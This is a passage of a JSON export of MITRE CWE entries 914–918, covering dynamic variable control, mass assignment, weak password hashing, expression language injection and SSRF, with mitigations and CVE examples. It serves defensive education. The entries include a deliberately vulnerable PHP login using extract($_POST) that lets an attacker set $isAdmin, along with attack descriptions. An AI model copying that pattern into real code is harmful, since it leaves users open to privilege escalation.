managed."}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2013-01-26"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}]}},"914":{"attr":{"@_ID":"914","@_Name":"Improper Control of Dynamically-Identified Variables","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not properly restrict reading from or writing to dynamically-identified variables.","Extended_Description":"Many languages offer powerful features that allow the programmer to access arbitrary variables that are specified by an input string. While these features can offer significant flexibility and reduce development time, they can be extremely dangerous if attackers can modify unintended variables that have security implications.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"99","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"913","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Application Data","Note":"An attacker could modify sensitive data or program variables."},{"Scope":"Integrity","Impact":"Execute Unauthorized Code or Commands"},{"Scope":["Other","Integrity"],"Impact":["Varies by Context","Alter Execution Logic"]}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Strategy":"Input Validation","Description":"For any externally-influenced input, check the input against an allowlist of internal program variables that are allowed to be modified."},{"Phase":["Implementation","Architecture and Design"],"Strategy":"Refactoring","Description":"Refactor the code so that internal program variables do not need to be dynamically identified."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-107"},"Intro_Text":"This code uses the credentials sent in a POST request to login a user.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function login($user,$pass){}$isAdmin = false;extract($_POST);login(mysql_real_escape_string($user),mysql_real_escape_string($pass));","xhtml:i":"//Log user in, and set $isAdmin to true if user is an administrator","xhtml:br":["","","","","",""],"xhtml:div":{"#text":"$query = buildQuery($user,$pass);mysql_query($query);if(getUserRole($user) == \\"Admin\\"){}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:div":{"#text":"$isAdmin = true;","attr":{"@_style":"margin-left:10px;"}}}}},"Body_Text":"The call to extract() will overwrite the existing values of any variables defined previously, in this case $isAdmin. An attacker can send a POST request with an unexpected third value \\"isAdmin\\" equal to \\"true\\", thus gaining Admin privileges."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2006-7135","Description":"extract issue enables file inclusion","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7135"},{"Reference":"CVE-2006-7079","Description":"extract used for register_globals compatibility layer, enables path traversal","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7079"},{"Reference":"CVE-2007-0649","Description":"extract() buried in include files makes post-disclosure analysis confusing; original report had seemed incorrect.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0649"},{"Reference":"CVE-2006-6661","Description":"extract() enables static code injection","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6661"},{"Reference":"CVE-2006-2828","Description":"import_request_variables() buried in include files makes post-disclosure analysis confusing","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2828"},{"Reference":"CVE-2009-0422","Description":"Chain: Dynamic variable evaluation allows resultant remote file inclusion and path traversal.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0422"},{"Reference":"CVE-2007-2431","Description":"Chain: dynamic variable evaluation in PHP program used to modify critical, unexpected $_SERVER variable for resultant XSS.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2431"},{"Reference":"CVE-2006-4904","Description":"Chain: dynamic variable evaluation in PHP program used to conduct remote file inclusion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4904"},{"Reference":"CVE-2006-4019","Description":"Dynamic variable evaluation in mail program allows reading and modifying attachments and preferences of other users.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4019"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2013-01-26"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}]}},"915":{"attr":{"@_ID":"915","@_Name":"Improperly Controlled Modification of Dynamically-Determined Object Attributes","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives input from an upstream component that specifies multiple attributes, properties, or fields that are to be initialized or updated in an object, but it does not properly control which attributes can be modified.","Extended_Description":{"xhtml:p":["If the object contains attributes that were only intended for internal use, then their unexpected modification could lead to a vulnerability.","This weakness is sometimes known by the language-specific mechanisms that make it possible, such as mass assignment, autobinding, or object injection."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"913","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"502","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"Ruby","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"ASP.NET","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"PHP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Python","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}]},"Alternate_Terms":{"Alternate_Term":[{"Term":"Mass Assignment","Description":"\\"Mass assignment\\" is the name of a feature in Ruby on Rails that allows simultaneous modification of multiple object attributes."},{"Term":"AutoBinding","Description":"The \\"Autobinding\\" term is used in frameworks such as Spring MVC and ASP.NET MVC."},{"Term":"PHP Object Injection","Description":"Some PHP application researchers use this term for attacking unsafe use of the unserialize() function, but it is also used for CWE-502."}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Application Data","Note":"An attacker could modify sensitive data or program variables."},{"Scope":"Integrity","Impact":"Execute Unauthorized Code or Commands"},{"Scope":["Other","Integrity"],"Impact":["Varies by Context","Alter Execution Logic"]}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":{"xhtml:p":["If available, use features of the language or framework that allow specification of allowlists of attributes or fields that are allowed to be modified. If possible, prefer allowlists over denylists.","For applications written with Ruby on Rails, use the attr_accessible (allowlist) or attr_protected (denylist) macros in each class that may be used in mass assignment."]}},{"Phase":["Architecture and Design","Implementation"],"Description":"If available, use the signing/sealing features of the programming language to assure that deserialized data has not been tainted. For example, a hash-based message authentication code (HMAC) could be used to ensure that data has not been modified."},{"Phase":"Implementation","Strategy":"Input Validation","Description":"For any externally-influenced input, check the input against an allowlist of internal object attributes or fields that are allowed to be modified."},{"Phase":["Implementation","Architecture and Design"],"Strategy":"Refactoring","Description":"Refactor the code so that object attributes or fields do not need to be dynamically identified, and only expose getter/setter functionality for the intended attributes."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2012-2054","Description":"Mass assignment allows modification of arbitrary attributes using modified URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2054"},{"Reference":"CVE-2012-2055","Description":"Source version control product allows modification of trusted key using mass assignment.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2055"},{"Reference":"CVE-2008-7310","Description":"Attackers can bypass payment step in e-commerce software.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-7310"},{"Reference":"CVE-2013-1465","Description":"Use of PHP unserialize function on untrusted input allows attacker to modify application configuration.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1465"},{"Reference":"CVE-2012-3527","Description":"Use of PHP unserialize function on untrusted input in content management system might allow code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3527"},{"Reference":"CVE-2012-0911","Description":"Use of PHP unserialize function on untrusted input in content management system allows code execution using a crafted cookie value.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0911"},{"Reference":"CVE-2012-0911","Description":"Content management system written in PHP allows unserialize of arbitrary objects, possibly allowing code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0911"},{"Reference":"CVE-2011-4962","Description":"Content management system written in PHP allows code execution through page comments.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4962"},{"Reference":"CVE-2009-4137","Description":"Use of PHP unserialize function on cookie value allows remote code execution or upload of arbitrary files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4137"},{"Reference":"CVE-2007-5741","Description":"Content management system written in Python interprets untrusted data as pickles, allowing code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5741"},{"Reference":"CVE-2011-2520","Description":"Python script allows local users to execute code via pickled data.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2520"},{"Reference":"CVE-2005-2875","Description":"Python script allows remote attackers to execute arbitrary code using pickled objects.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2875"},{"Reference":"CVE-2013-0277","Description":"Ruby on Rails allows deserialization of untrusted YAML to execute arbitrary code.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0277"},{"Reference":"CVE-2011-2894","Description":"Spring framework allows deserialization of objects from untrusted sources to execute arbitrary code.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2894"},{"Reference":"CVE-2012-1833","Description":"Grails allows binding of arbitrary parameters to modify arbitrary object properties.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1833"},{"Reference":"CVE-2010-3258","Description":"Incorrect deserialization in web browser allows escaping the sandbox.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3258"},{"Reference":"CVE-2008-1013","Description":"Media library allows deserialization of objects by untrusted Java applets, leading to arbitrary code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1013"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-885"}},{"attr":{"@_External_Reference_ID":"REF-886"}},{"attr":{"@_External_Reference_ID":"REF-887"}},{"attr":{"@_External_Reference_ID":"REF-888"}},{"attr":{"@_External_Reference_ID":"REF-889"}},{"attr":{"@_External_Reference_ID":"REF-890"}},{"attr":{"@_External_Reference_ID":"REF-891"}},{"attr":{"@_External_Reference_ID":"REF-892"}},{"attr":{"@_External_Reference_ID":"REF-893"}},{"attr":{"@_External_Reference_ID":"REF-894"}},{"attr":{"@_External_Reference_ID":"REF-464"}},{"attr":{"@_External_Reference_ID":"REF-466"}}]},"Notes":{"Note":{"#text":"The relationships between CWE-502 and CWE-915 need further exploration. CWE-915 is more narrowly scoped to object modification, and is not necessarily used for deserialization.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2013-01-26"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Alternate_Terms, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}],"Contribution":{"attr":{"@_Type":"Feedback"},"Contribution_Name":"Dan Amodio, Dave Wichers","Contribution_Organization":"Aspect Security","Contribution_Date":"2013-01-26","Contribution_Comment":"Suggested adding mass assignment, provided references, and clarified relationship with AutoBinding."}}},"916":{"attr":{"@_ID":"916","@_Name":"Use of Password Hash With Insufficient Computational Effort","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software generates a hash for a password, but it uses a scheme that does not provide a sufficient level of computational effort that would make password cracking attacks infeasible or expensive.","Extended_Description":{"xhtml:p":["Many password storage mechanisms compute a hash and store the hash, instead of storing the original password in plaintext. In this design, authentication involves accepting an incoming password, computing its hash, and comparing it to the stored hash.","Many hash algorithms are designed to execute quickly with minimal overhead, even cryptographic hashes. However, this efficiency is a problem for password storage, because it can reduce an attacker\'s workload for brute-force password cracking. If an attacker can obtain the hashes through some other method (such as SQL injection on a database that stores hashes), then the attacker can store the hashes offline and use various techniques to crack the passwords by computing hashes efficiently. Without a built-in workload, modern attacks can compute large numbers of hashes, or even exhaust the entire space of all possible passwords, within a very short amount of time, using massively-parallel computing (such as cloud computing) and GPU, ASIC, or FPGA hardware. In such a scenario, an efficient hash algorithm helps the attacker.","There are several properties of a hash scheme that are relevant to its strength against an offline, massively-parallel attack:","Note that the security requirements for the software may vary depending on the environment and the value of the passwords. Different schemes might not provide all of these properties, yet may still provide sufficient security for the environment. Conversely, a solution might be very strong in preserving one property, which still being very weak for an attack against another property, or it might not be able to significantly reduce the efficiency of a massively-parallel attack."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["The amount of CPU time required to compute the hash (\\"stretching\\")","The amount of memory required to compute the hash (\\"memory-hard\\" operations)","Including a random value, along with the password, as input to the hash computation (\\"salting\\")","Given a hash, there is no known way of determining an input (e.g., a password) that produces this hash value, other than by guessing possible inputs (\\"one-way\\" hashing)","Relative to the number of all possible hashes that can be generated by the scheme, there is a low likelihood of producing the same hash for multiple different inputs (\\"collision resistance\\")"]}}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"327","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"327","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity"],"Note":"If an attacker can gain access to the hashes, then the lack of sufficient computational effort will make it easier to conduct brute force attacks using techniques such as rainbow tables, or specialized hardware such as GPUs, which can be much faster than general-purpose CPUs for computing hashes."}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Bytecode Weakness Analysis - including disassembler + source code weakness analysis","Binary Weakness Analysis - including disassembler + source code weakness analysis"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Focused Manual Spotcheck - Focused manual analysis of source","Manual Source Code Review (not inspections)"]}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Configuration Checker"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-51"},"Phase":"Architecture and Design","Description":{"xhtml:p":["Use an adaptive hash function that can be configured to change the amount of computational effort needed to compute the hash, such as the number of iterations (\\"stretching\\") or the amount of memory required. Some hash functions perform salting automatically. These functions can significantly increase the overhead for a brute force attack compared to intentionally-fast functions such as MD5. For example, rainbow table attacks can become infeasible due to the high computing overhead. Finally, since computing power gets faster and cheaper over time, the technique can be reconfigured to increase the workload without forcing an entire replacement of the algorithm in use.","Some hash functions that have one or more of these desired properties include bcrypt [REF-291], scrypt [REF-292], and PBKDF2 [REF-293]. While there is active debate about which of these is the most effective, they are all stronger than using salts with hash functions with very little computing overhead.","Note that using these functions can have an impact on performance, so they require special consideration to avoid denial-of-service attacks. However, their configurability provides finer control over how much CPU and memory is used, so it could be adjusted to suit the environment\'s needs."]},"Effectiveness":"High"},{"attr":{"@_Mitigation_ID":"MIT-25"},"Phase":["Implementation","Architecture and Design"],"Description":"When using industry-approved techniques, use them correctly. Don\'t cut corners by skipping resource-intensive steps (CWE-325). These steps are often essential for preventing common attacks."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-1526","Description":"Router does not use a salt with a hash, making it easier to crack passwords.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1526"},{"Reference":"CVE-2006-1058","Description":"Router does not use a salt with a hash, making it easier to crack passwords.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1058"},{"Reference":"CVE-2008-4905","Description":"Blogging software uses a hard-coded salt when calculating a password hash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4905"},{"Reference":"CVE-2002-1657","Description":"Database server uses the username for a salt when encrypting passwords, simplifying brute force attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1657"},{"Reference":"CVE-2001-0967","Description":"Server uses a constant salt when encrypting passwords, simplifying brute force attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0967"},{"Reference":"CVE-2005-0408","Description":"chain: product generates predictable MD5 hashes using a constant value combined with username, allowing authentication bypass.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0408"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"55"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-291"}},{"attr":{"@_External_Reference_ID":"REF-292"}},{"attr":{"@_External_Reference_ID":"REF-293","@_Section":"5.2 PBKDF2"}},{"attr":{"@_External_Reference_ID":"REF-294"}},{"attr":{"@_External_Reference_ID":"REF-295"}},{"attr":{"@_External_Reference_ID":"REF-296"}},{"attr":{"@_External_Reference_ID":"REF-297"}},{"attr":{"@_External_Reference_ID":"REF-298"}},{"attr":{"@_External_Reference_ID":"REF-636"}},{"attr":{"@_External_Reference_ID":"REF-631"}},{"attr":{"@_External_Reference_ID":"REF-632"}},{"attr":{"@_External_Reference_ID":"REF-908"}},{"attr":{"@_External_Reference_ID":"REF-909"}},{"attr":{"@_External_Reference_ID":"REF-633"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2013-01-28","Submission_Comment":"Created with input from members of the secure password hashing community."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"917":{"attr":{"@_ID":"917","@_Name":"Improper Neutralization of Special Elements used in an Expression Language Statement (\'Expression Language Injection\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software constructs all or part of an expression language (EL) statement in a Java Server Page (JSP) using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended EL statement before it is executed.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"77","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"74","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"77","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"77","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"EL Injection"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Application Data"},{"Scope":"Integrity","Impact":"Execute Unauthorized Code or Commands"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-911"}},{"attr":{"@_External_Reference_ID":"REF-912"}}]},"Notes":{"Note":{"#text":"In certain versions of Spring 3.0.5 and earlier, there was a vulnerability (CVE-2011-2730) in which Expression Language tags would be evaluated twice, which effectively exposed any application to EL injection. However, even for later versions, this weakness is still possible depending on configuration.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2013-02-15"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated References"}],"Contribution":{"attr":{"@_Type":"Feedback"},"Contribution_Name":"Dan Amodio, Dave Wichers","Contribution_Organization":"Aspect Security","Contribution_Date":"2013-02-15","Contribution_Comment":"Suggested adding this weakness and provided references."}}},"918":{"attr":{"@_ID":"918","@_Name":"Server-Side Request Forgery (SSRF)","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination.","Extended_Description":"By providing URLs to unexpected hosts or ports, attackers can make it appear that the server is sending the request, possibly bypassing access controls such as firewalls that prevent the attackers from accessing the URLs directly. The server can be used as a proxy to conduct port scanning of hosts in internal networks, use other URLs such as that can access documents on the system (using file://), or use other protocols such as gopher:// or tftp://, which may provide greater control over the contents of requests.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"441","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"610","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Name":"Web Server","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"XSPA","Description":"Cross Site Port Attack"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Application Data"},{"Scope":"Integrity","Impact":"Execute Unauthorized Code or Commands"}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1484","Description":"Web server allows attackers to request a URL from another server, including other ports, which allows proxied scanning.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1484"},{"Reference":"CVE-2004-2061","Description":"CGI script accepts and retrieves incoming URLs.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2061"},{"Reference":"CVE-2010-1637","Description":"Web-based mail program allows internal network scanning using a modified POP3 port number.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1637"},{"Reference":"CVE-2009-0037","Description":"URL-downloading library automatically follows redirects to file:// and scp:// URLs","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0037"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"664"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-913"}},{"attr":{"@_External_Reference_ID":"REF-914"}},{"attr":{"@_External_Reference_ID":"REF-915"}},{"attr":{"@_External_Reference_ID":"REF-916"}},{"attr":{"@_External_Reference_ID":"REF-917"}},{"attr":{"@_External_Reference_ID":"REF-918"}},{"attr":{"@_External_Reference_ID":"REF-919"}},{"attr":{"@_External_Reference_ID":"REF-920"}}]},"Notes":{"Note":{"#text":"CWE-918 (SSRF) and CWE-611 (XXE) are closely related, because they both involve web-related technologies and can launch outbound requests to unexpected destinations. However, XXE can be performed client-side, or in other contexts in which the software is not acting directly as a server, so the \\"Server\\" portion of the SSRF acronym does not necessarily apply.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2013-02-17"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated 